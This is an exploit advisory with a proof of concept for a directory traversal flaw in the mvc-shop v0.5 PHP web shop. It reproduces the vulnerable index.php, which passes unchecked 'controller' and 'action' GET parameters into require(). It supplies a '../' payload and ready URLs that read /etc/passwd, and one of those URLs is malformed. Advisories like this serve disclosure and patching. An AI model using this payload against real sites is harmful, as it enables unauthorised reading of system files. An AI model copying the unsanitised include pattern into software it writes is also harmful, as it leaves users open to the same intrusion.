==================================================================================================================================== | # Title : mvc-shop v0.5 Directory Traversal Vulnerability Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | | # Vendor : https://github.com/tanhongit/new-mvc-shop/releases/tag/v0.5 | | # Dork : | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] infested file : index.php & admin.php <!-- Developed by: TanHongIT Website: https://tanhongit.com - https://tanhongit.net Github: https://github.com/TanHongIT --> <?php session_start(); require_once('lib/model.php'); require_once('lib/functions.php'); require_once('content/models/cart.php'); require "lib/statistics.php"; require "lib/counter.php"; // $count_file = 'logs/counter.txt'; // $ip_file = 'logs/ip.txt'; // function counting_ip() // { // $ip = $_SERVER['REMOTE_ADDR']; // global $count_file, $ip_file; // if (!in_array($ip, file($ip_file, FILE_IGNORE_NEW_LINES))) { // $current_val = (file_exists($count_file)) ? file_get_contents($count_file) : 0; // file_put_contents($ip_file, $ip . "\n", FILE_APPEND); // file_put_contents($count_file, ++$current_val); // } // } // counting_ip(); if (isset($_GET['controller'])) $controller = $_GET['controller']; else $controller = 'home'; if (isset($_GET['action'])) $action = $_GET['action']; else $action = 'index'; $file = 'content/controllers/' . $controller . '/' . $action . '.php'; if (file_exists($file)) { require($file); } else { show_404(); } [+] use payload : ../../../../../../../../../etc/passwd [+] https://127.0.0.1/chikoiquan.tanhongitcom/index.php?action=../../../../../../../../../etc/passwd [+] https://127.0.0.1/https://chikoiquan.tanhongitcom/admin.php?file=../../../../../../../../../etc/passwd == Greetings to :=========================================================================== jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | ============================================================================================